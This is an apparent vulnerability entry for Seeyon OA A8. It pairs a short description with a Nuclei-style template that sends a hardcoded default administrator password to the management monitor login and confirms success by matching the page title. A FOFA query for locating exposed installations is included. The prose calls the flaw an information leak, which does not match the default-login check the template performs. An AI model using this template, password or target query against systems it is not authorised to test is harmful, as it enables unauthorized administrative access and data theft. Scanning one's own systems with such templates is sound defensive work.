Seeyon OA A8-m has status monitoring page information leakage. Attackers can obtain sensitive information such as website paths and user names for further attacks. Attackers can use this vulnerability to directly enter the application system or management system to conduct system, web page, data tampering and deletion, illegally obtaining system and user data, and may even cause the server to collapse.
PoC代码[已公开]
id: seeyon-monitor-default-login
info:
name: Seeyon A8 Management Monitor - Default Login
author: SleepingBag945
severity: high
description: |
Seeyon OA A8-m has status monitoring page information leakage. Attackers can obtain sensitive information such as website paths and user names for further attacks. Attackers can use this vulnerability to directly enter the application system or management system to conduct system, web page, data tampering and deletion, illegally obtaining system and user data, and may even cause the server to collapse.
reference:
- http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20status.jsp%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/default-pwd/seeyon-a8-management-monitor-default-password.yaml
metadata:
verified: true
max-request: 1
fofa-query: app="致远互联-OA"
tags: seeyon,oa,default-login,vuln
http:
- raw:
- |
POST /seeyon/management/index.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
password=WLCCYBD%40SEEYON
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>A8 Management Monitor</title>"
- "Connection Pooling"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402203c4188cbe58869fa3d5786201d78f686786e881577d38668fb20ccdcff5c5603022078d5749318ae0abdc63536fd62da445f3da86e5b12fe59d49026a4b314dc0650:922c64590222798bb761d5b6d8e72950